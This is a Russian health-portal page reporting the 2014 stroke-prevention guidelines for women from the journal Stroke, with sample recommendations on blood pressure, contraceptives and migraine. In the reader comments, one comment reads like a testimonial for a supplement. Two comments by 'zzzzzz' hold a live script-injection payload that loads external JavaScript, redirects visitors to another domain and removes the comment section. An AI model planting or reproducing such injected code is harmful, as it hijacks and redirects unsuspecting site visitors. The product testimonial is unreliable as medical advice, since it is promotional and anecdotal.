Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Новый год – самое время д...  >>  Новый год – самое время для инсульта! Но большинство женщин узнает об этом слишком поздно!
 
Обратная связь
 

Новый год – самое время для инсульта! Но большинство женщин узнает об этом слишком поздно!

Размер шрифта
23 мая 2014 00:00
  • google_analytics: false
  • Нравится

Впервые в истории на суд общественности представлены клинические рекомендации, касающиеся инсульта исключительно у женщин.

zhenschiny_ne_uznayut_kogda_u_nih_insult_u_nih_sovsem_drugie_priznaki

К слову говоря, клинические рекомендации – это те скрижали, на которые опираются в своей работе врачи. Авторитетность этого документа незыблема, каждое слово в нем – фактически, закон.

Рекомендации, посвященные инсульту у женщин, были опубликованы в майском номере журнала Stroke («Инсульт»), который является одним из самых уважаемый изданий в неврологии.

Авторы утверждают, что несмотря на наличие ряда общих факторов риска (артериальная гипертензия, высокий уровень холестерина, диабет, курение, ожирение и другие), женский инсульт, тем не менее, имеет ряд уникальных черт, которые дают основания рассматривать его отдельно от мужского.

«Беременность, деторождение, особый гормональный профиль – все это играет свою роль в формировании риска инсульта у женщин», – поясняет доктор Черил Башнелл, один из авторов редколлегии, работавшей над созданием рекомендаций.

«Основной момент, который мы хотим донести: женщины в целом живут дольше, и именно поэтому они имеют более высокий риск столкнуться с инсультом в течение жизни», – говорит Башнелл. «Кроме того, женщины хуже восстанавливаются после этого тяжелого заболевания: они чаще нуждаются в постоянном уходе и, в целом, их качество жизни ухудшается значительнее. Именно поэтому мы сочли нужным создать рекомендации, в которых особая роль отведена стратегиям профилактики инсульта. И профилактика эта должна начинаться очень рано – в детородном возрасте».

Об инсульте говорят, когда кровеносный сосуд в мозге закупоривается, что приводит к нарушениям доставки кислорода и питательных веществ к нервным клеткам. Последние очень нетерпимы к подобного рода лишениями, и погибают очень быстро.

Ежегодная заболеваемость инсультом среди женщин превышает таковую у мужчин на 55 000 человек.

Данные клинические рекомендации были высоко оценены сторонними специалистами. «Они проделали замечательную работу», – говорит доктор Эндрю Руссман, невролог из цереброваскулярного центра Кливлендской клиники (штат Огайо, США). «Убежден, что эти рекомендации крайне важны, поскольку позволяют донести до женщин суть уникальных факторов риска, которые меняются в течение различных периодов их жизни – во время беременности, с наступлением менопаузы и так далее».

Башнелл утверждает, что она и ее коллеги проработали огромный пласт уже имеющей литературы на эту тему, что позволило им создать всеобъемлющие рекомендации, которые подходят женщинам всех возрастных категорий.

«Конечно, риск максимален у женщин пожилого возраста, особенно если они накапливали факторы риска в течение жизни», – говорит Башнелл.

Тем не менее, фундамент для грядущей катастрофы зачастую закладывается намного раньше – скажем, во время беременности. Например, известно, что у женщин, которые в ходе беременности столкнулись с эклампсией или преэклампсией (жизнеугрожающие состояния, связанные с повышением артериального давления), риск развития инсульта впоследствии повышается в два раза.

Другим фактором риска является прием противозачаточных таблеток, особенно в среднем возрасте. Наличие мигрени с аурой также является прогностически неблагоприятным фактором.

Вот как выглядят некоторые конкретные рекомендации:

  • Женщинам, у которых отмечалось высокое артериальное давление до беременности, рекомендуется принимать аспирин в малых дозах и добавки с кальцием во время беременности.
  • Беременным женщинам с повышенным артериальным давлением (150-159/100-109 мм.рт.ст.) следует обсудить с лечащим врачом необходимость гипотензивной терапии.
  • Беременным женщинам с выраженной артериальной гипертензией (160/110 мм.рт.ст и выше) однозначно следует принимать препараты для снижения давления.
  • Перед началом курса противозачаточных препаратов женщина должна проверить свое артериальное давление.
  • Женщинам, страдающим от мигреней с аурой, следует бросить курить.
  • Женщины старше 75 лет должны быть обследованы на предмет наличия фибрилляции предсердий (одна из самых распространенных аритмий).

«К сожалению, по-настоящему специфическая профилактическая стратегия для женщин пока не разработана», – говорит Башнелл. «Тем не менее, все рекомендации по здоровому образу жизни в равной степени справедливы как для мужчин, так и для женщин».

Что ж, будем ждать дальнейшей проработки этой многообещающей концепции, которая, несомненно, в итоге позволит снизить показатели заболеваемости и смертности от инсульта среди женщин.

Другие тайны женского здоровья раскрываются на страницах нашего одноименного спецпроекта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - pomk93

06 июня 2014 в 09:50

Комментарий удален за нарушение Правил общения

2 - Кармелита

07 ноября 2014 в 21:06

Цитировать   |   Пожаловаться

Во время беременности у меня давление повышенным не было, а вот сейчас иногда случается до потемнения в глазах, головных болей и головокружений. И каждодневная нагрузка мне стала в тягость. Доктор мне порекомендовала вазобрал принимать 2 раза в день (но не после 17 часов) и я почувствовала облегчение. Головные боли постепенно отступили, потемнение прошло, да и голова прояснилась даже. Сейчас уже понимаю, что это не просто усталость была. Хорошо, что вовремя обратилась за помощью.

3 - zzzzzz

30 июня 2015 в 18:39

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как угробить свое сердце?!   10 ужасов недосыпа   Главная причина вашего лишнего веса   Вот кто-то с горочки спустился  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 13 июня 2013Перец, как и сигареты, спасает от Паркинсона!
 

Слайдшоу

1
Бессонница. Поможет ли вино уснуть?
9 мифов о диабете
Что должна сделать каждая уважающая себя женщина

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.